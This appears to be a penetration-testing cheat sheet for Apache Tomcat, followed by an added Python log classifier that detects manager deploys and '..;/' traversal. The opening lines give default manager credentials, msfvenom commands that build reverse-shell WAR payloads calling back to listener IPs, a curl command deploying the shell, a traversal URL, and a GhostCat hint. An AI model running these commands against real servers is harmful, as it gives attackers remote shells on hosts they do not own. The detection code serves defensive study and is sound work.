Access /manager with default creds
Usually tomcat:s3cret
Then upload and deploy a reverse-shell WAR file:
#Linux
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.122 LPORT=443 -f war -o revshell.war
#Windows
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.83 LPORT=9002 -f war > revshell.war
Upload via curl
curl --user 'tomcat:s3cret' --upload-file shell.war 'localhost:8080/manager/deploy?path=/shell'
Tomcat path traversal
https://10.10.10.25/manager/status/..;/html/
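Detection-side view of the curl deploy and the `..;/` traversal above, as an added example that is not part of the original notes: a Python classifier for Tomcat access-log lines in the AccessLogValve `common` pattern. The sample lines, the finding names and the `/manager/text/deploy` variant are assumptions added here.

```python
import re
from urllib.parse import unquote

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+$')
# A dot segment carrying a ";param" suffix, e.g. "/..;/"
DOT_PARAM_RE = re.compile(r'/\.{1,2};[^/]*(/|$)')
DEPLOY_RE = re.compile(r'^/manager/(text/)?deploy$')

def normalize(path):
    """Approximate the servlet container's view of a path:
    drop ;parameters from each segment, then resolve dot segments."""
    out = []
    for seg in path.split('/'):
        seg = seg.split(';', 1)[0]
        if seg == '..':
            if out:
                out.pop()
        elif seg not in ('', '.'):
            out.append(seg)
    return '/' + '/'.join(out)

def classify(line):
    """Return the list of findings (hypothetical names) for one log line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return ['unparsed']
    raw = unquote(m['uri'].split('?', 1)[0])
    effective = normalize(raw)
    findings = []
    if DOT_PARAM_RE.search(raw):
        findings.append('dot-segment-with-path-parameter')
        if effective.startswith('/manager'):
            findings.append('manager-reached-via-dot-param')
    if m['method'] == 'PUT' and DEPLOY_RE.match(effective):
        # 401/403 means the manager refused the credentials or the role.
        denied = m['status'] in ('401', '403')
        findings.append('manager-deploy-denied' if denied
                        else f"manager-deploy-by-{m['user']}")
    return findings

# Constructed sample lines, not taken from a real server.
SAMPLE = [
    '192.0.2.5 - - [12/Mar/2024:10:01:02 +0000] "GET /manager/status/..;/html/ HTTP/1.1" 200 1843',
    '192.0.2.5 - tomcat [12/Mar/2024:10:02:10 +0000] "PUT /manager/deploy?path=/shell HTTP/1.1" 200 58',
    '192.0.2.9 - - [12/Mar/2024:10:03:00 +0000] "GET /app/index.jsp;jsessionid=AB12 HTTP/1.1" 200 512',
]
```

An ordinary `;jsessionid=` parameter is not flagged; only a dot segment with a parameter suffix is, which is the form a front-end proxy and Tomcat can resolve differently.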
If port 8009 (AJP) is open, chances are the host is vulnerable to GhostCat